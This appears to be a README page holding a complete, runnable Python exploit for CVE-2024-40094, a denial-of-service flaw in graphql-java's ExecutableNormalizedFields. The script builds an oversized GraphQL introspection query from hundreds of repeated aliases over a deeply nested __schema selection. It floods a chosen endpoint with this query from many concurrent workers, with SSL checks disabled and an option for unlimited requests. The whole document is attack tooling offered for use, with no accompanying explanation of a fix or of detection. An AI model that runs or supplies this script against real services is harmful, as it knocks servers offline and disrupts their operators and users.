# README.md
# Rendering markdown...
# CVE-2024-40094 exploit
# ExecutableNormalizedFields (ENF)
import argparse
import asyncio
import logging
import aiohttp
import time
import urllib3
from typing import Dict, Optional
# Disable SSL verification warnings (targets frequently use self-signed certificates)
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
# Default target endpoint; override with --url
DEFAULT_URL = "https://api.example.com/graphql"
# Default request headers; extend or override with repeated --header options
DEFAULT_HEADERS: Dict[str, str] = {
"Host": "api.example.com",
"Authorization": "Bearer <token>",
"Content-Type": "application/json",
}
# Number of concurrent jobs (similar to threads)
# Each job will be a coroutine
# Use a conservative default to avoid overwhelming the target by accident.
DEFAULT_JOB_COUNT = 50
# Number of repeated alias blocks in the query (depth of stress on the server)
DEFAULT_ALIAS_COUNT = 500
# Delay between requests (in seconds)
DEFAULT_REQUEST_DELAY = 0.0
# Maximum number of requests each job sends (for clean shutdown)
# Set to None for an unlimited number of requests
DEFAULT_MAX_REQUESTS_PER_JOB: Optional[int] = 1000
# Log file for recording request/response summaries
LOG_FILE = "enf_attack_async.log"
# Module-level logger shared by the workers
logger = logging.getLogger(__name__)
def build_enf_query(alias_count: int) -> str:
    """
    Build a large introspection-based GraphQL document with repeated aliases
    to potentially trigger ENF-based denial of service in vulnerable
    graphql-java.

    Every alias points at the same nested ``__schema`` selection, so document
    size (and server-side normalization work) scales linearly with
    ``alias_count``. The selection nests ~5-7 levels; it can be pushed deeper
    if needed.
    """
    nested_block = """
__schema {
types {
name
fields {
name
type {
name
fields {
name
type {
name
fields {
name
}
}
}
}
}
}
}
"""
    # One "aliasN:<selection>" fragment per requested alias, numbered from 1.
    aliased = (f"alias{n}:{nested_block}" for n in range(1, alias_count + 1))
    return f"""
query ENF_Exploit {{
{''.join(aliased)}
}}
"""
async def worker(
    session: aiohttp.ClientSession,
    worker_id: int,
    semaphore: asyncio.BoundedSemaphore,
    url: str,
    alias_count: int,
    request_delay: float,
    max_requests: Optional[int],
) -> None:
    """
    One asynchronous job: POST the oversized query to ``url`` in a loop.

    Runs until ``max_requests`` requests have been sent (``None`` means no
    limit) or the first error occurs; the semaphore caps how many requests
    across all workers are in flight at once.
    """
    sent = 0
    while True:
        # Honor the per-job request cap, if one was configured.
        if max_requests is not None and sent >= max_requests:
            logger.info("[Worker-%d] Max requests reached. Stopping...", worker_id)
            break
        payload = build_enf_query(alias_count)
        started = time.time()
        try:
            # The async context manager acquires/releases the semaphore for us.
            async with semaphore:
                # Submit the GraphQL query as a JSON body.
                async with session.post(url, json={"query": payload}, ssl=False) as resp:
                    status_code = resp.status
                    body = await resp.text()
                    body_len = len(body)
                    preview = body[:200].replace("\n", " ")
                    elapsed = time.time() - started
                    logger.info(
                        f"[Worker-{worker_id}] Status: {status_code}, Len: {body_len}, "
                        f"Time: {elapsed:.2f}s, Snippet: {preview}..."
                    )
        except Exception as exc:
            # Any failure (connect error, timeout, ...) terminates this worker.
            logger.exception("[Worker-%d] Error: %s", worker_id, exc)
            break
        sent += 1
        if request_delay > 0:
            await asyncio.sleep(request_delay)
def configure_logging(log_level: str) -> None:
    """Attach file and console handlers to the module logger.

    ``log_level`` is a level name such as "DEBUG" or "INFO"; names that
    ``logging`` does not recognize fall back to INFO.
    """
    resolved = getattr(logging, log_level.upper(), logging.INFO)
    logger.setLevel(resolved)
    fmt = logging.Formatter("%(asctime)s [%(levelname)s] %(message)s")
    # Mirror every record to the log file and to the console.
    for handler in (logging.FileHandler(LOG_FILE), logging.StreamHandler()):
        handler.setFormatter(fmt)
        logger.addHandler(handler)
async def main(
    url: str,
    headers: Dict[str, str],
    job_count: int,
    alias_count: int,
    request_delay: float,
    max_requests: Optional[int],
    log_level: str,
    concurrency_limit: int,
) -> None:
    """
    Spawn all worker coroutines and wait for every one of them to finish.

    A single shared ClientSession is used so aiohttp can pool connections,
    and a bounded semaphore caps the number of simultaneous requests at
    ``concurrency_limit``.
    """
    configure_logging(log_level)
    semaphore = asyncio.BoundedSemaphore(concurrency_limit)
    async with aiohttp.ClientSession(headers=headers) as session:
        jobs = [
            asyncio.create_task(
                worker(
                    session,
                    job_id,
                    semaphore,
                    url,
                    alias_count,
                    request_delay,
                    max_requests,
                )
            )
            for job_id in range(job_count)
        ]
        # Block until every worker has stopped.
        await asyncio.gather(*jobs)
def parse_args() -> argparse.Namespace:
    """Parse CLI options and derive the effective headers and limits.

    Adds a ``headers`` attribute (defaults merged with --header overrides),
    defaults --concurrency-limit to --job-count, and maps --max-requests 0
    to ``None`` (unlimited).
    """
    parser = argparse.ArgumentParser(description="CVE-2024-40094 exploit")
    parser.add_argument("--url", default=DEFAULT_URL, help="Target GraphQL API URL")
    parser.add_argument(
        "--header",
        action="append",
        default=[],
        help="Additional header in 'Key: Value' format. Can be specified multiple times.",
    )
    parser.add_argument(
        "--job-count",
        type=int,
        default=DEFAULT_JOB_COUNT,
        help="Number of concurrent jobs to spawn.",
    )
    parser.add_argument(
        "--alias-count",
        type=int,
        default=DEFAULT_ALIAS_COUNT,
        help="Number of repeated alias blocks in the query.",
    )
    parser.add_argument(
        "--delay",
        type=float,
        default=DEFAULT_REQUEST_DELAY,
        help="Delay between requests in seconds.",
    )
    parser.add_argument(
        "--max-requests",
        type=int,
        default=DEFAULT_MAX_REQUESTS_PER_JOB,
        help="Maximum number of requests each job sends (0 for unlimited).",
    )
    parser.add_argument(
        "--log-level",
        default="INFO",
        help="Logging level (e.g., DEBUG, INFO, WARNING, ERROR, CRITICAL)",
    )
    parser.add_argument(
        "--concurrency-limit",
        type=int,
        help="Maximum number of simultaneous requests allowed; defaults to --job-count.",
    )
    args = parser.parse_args()
    # Merge CLI-supplied headers over the defaults (first colon splits key/value).
    merged: Dict[str, str] = dict(DEFAULT_HEADERS)
    for raw in args.header:
        if ":" not in raw:
            parser.error(f"Invalid header format: {raw}")
        name, _, value = raw.partition(":")
        merged[name.strip()] = value.strip()
    args.headers = merged
    if args.concurrency_limit is None:
        args.concurrency_limit = args.job_count
    if args.job_count > args.concurrency_limit:
        parser.error(
            f"--job-count ({args.job_count}) exceeds --concurrency-limit ({args.concurrency_limit})"
        )
    # A cap of 0 means "no per-job limit".
    if args.max_requests == 0:
        args.max_requests = None
    return args
if __name__ == "__main__":
    cli = parse_args()
    try:
        asyncio.run(
            main(
                cli.url,
                cli.headers,
                cli.job_count,
                cli.alias_count,
                cli.delay,
                cli.max_requests,
                cli.log_level,
                cli.concurrency_limit,
            )
        )
    except KeyboardInterrupt:
        # Ctrl-C: exit cleanly instead of dumping a traceback.
        logger.info("KeyboardInterrupt received. Shutting down...")